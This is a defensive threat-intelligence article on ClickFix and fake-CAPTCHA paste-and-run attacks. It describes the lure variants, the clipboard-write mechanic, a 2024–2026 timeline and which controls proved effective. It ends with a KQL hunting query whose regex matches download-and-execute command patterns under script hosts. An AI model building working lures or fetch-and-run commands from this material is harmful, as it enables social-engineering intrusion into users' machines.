ClickFix and Fake-CAPTCHA Paste-and-Run: From 2024 Variant to 2026 Default Stage-One

Why This Matters Now

Fake-CAPTCHA paste-and-run, commonly shorthanded as ClickFix or ClearFake depending on the variant, started as a niche social-engineering trick in early 2024 and became one of the most common stage-one execution paths reported across Microsoft, Proofpoint, ReliaQuest, and Sekoia by 2025 and into 2026. The reason it scaled is structural rather than novel: the technique sidesteps email-attachment defenses by moving the malicious code out of the email entirely and into the user's clipboard, where the user themselves becomes the execution vector.

For defenders, the consequence is that the high-fidelity signal moved. The email gateway sees a benign link, or sometimes nothing at all. The browser sees a webpage that legitimately writes to the clipboard. The endpoint sees PowerShell or mshta launched by the user. If telemetry is not joined across those layers, the attack is invisible.

Shape of the Trend

The technique has three common variants. The fake-CAPTCHA variant displays a "verify you are human" overlay that instructs the user to press Win+R, paste a "verification code," and press Enter. The verification code is a PowerShell or mshta one-liner. The fake-error variant shows a Microsoft-styled error dialog claiming the user's browser must be updated and instructs the same paste-and-run sequence to "fix" it. The fake-Cloudflare variant impersonates a legitimate Cloudflare challenge page and uses the same final paste-and-run pattern.

All three rely on JavaScript on the lure page to write the malicious command to the user's clipboard automatically when the user clicks a button labeled "verify" or "continue." From the user's point of view, they are following dialog instructions. From the defender's point of view, the browser process wrote to the clipboard and the user pasted it into a script host within seconds.

Timeline 2024 → 2026

Public reporting suggests early ClickFix and ClearFake variants appeared in the first half of 2024 and were initially associated with a small number of clusters tracked by Proofpoint and Sekoia. By late 2024, the technique was in widespread use across initial-access brokers and ransomware-aligned operators, with payloads ranging across commodity loaders per public writeups. Through 2025 and into 2026, the variants diversified — the fake-Cloudflare-challenge form gained particular traction in the second half of 2025 per Sekoia and ReliaQuest reporting.

TTPs in Detail

The mechanic depends on three things being true: the lure page must be able to write to the clipboard (a permission most browsers grant on user click), the user must be willing to follow paste-and-run instructions, and a script host (PowerShell, mshta, wscript, conhost) must be available on the endpoint. Public reporting documents pivots into commodity stealers and loaders. Stage-two payloads are operator-dependent and not stable across campaigns, so detection logic that targets the paste-and-run mechanic is more durable than logic targeting any particular follow-on.

The lure pages themselves vary in fidelity. Some are crude and visibly imitations; others are byte-accurate clones of legitimate Cloudflare interstitials. The defender opportunity is not in the page — it is in the cross-layer signal it generates.

What Worked, What Didn't

Email-side controls have not generally caught the technique because the email is often a benign link to a compromised site or an ad-network redirect, with no attachment to scan. URL filtering catches some campaigns when the lure host is known but lags new infrastructure. Browser SmartScreen and SafeBrowsing catch some pages but not enough to be a primary control.

What works is endpoint-side. EDR rules that observe a script host launched by the Run dialog (parent process explorer.exe) with command-line content matching the typical paste-and-run patterns surface the technique reliably. Awareness training also has measurable effect when it specifically teaches the paste-and-run pattern; generic anti-phishing training does not transfer to this case according to multiple defender writeups.

Where It's Heading

Public reporting through early 2026 indicates the technique is now a baseline capability across initial-access brokers rather than the signature of any one cluster. Defenders should expect it to continue diversifying in lure presentation while remaining stable in mechanic. The endpoint-side detection signature is durable across variants because the clipboard-write-then-run pattern is what makes the technique work; remove that, and the technique no longer functions.

// Hunt for paste-and-run pattern symptom: a script host launched from
// the Run dialog (explorer.exe parent) with suspicious command-line
// content. Pair with browser-side telemetry where available for
// higher fidelity.
DeviceProcessEvents
| where Timestamp > ago(24h)
| where InitiatingProcessFileName =~ "explorer.exe"
| where FileName in~ ("powershell.exe", "mshta.exe", "wscript.exe", "cmd.exe")
| where ProcessCommandLine matches regex @"(?i)(iex|invoke-expression|downloadstring|frombase64string|webclient|http[s]?://)"
| project Timestamp, DeviceName, AccountName, FileName,
          ProcessCommandLine, InitiatingProcessFileName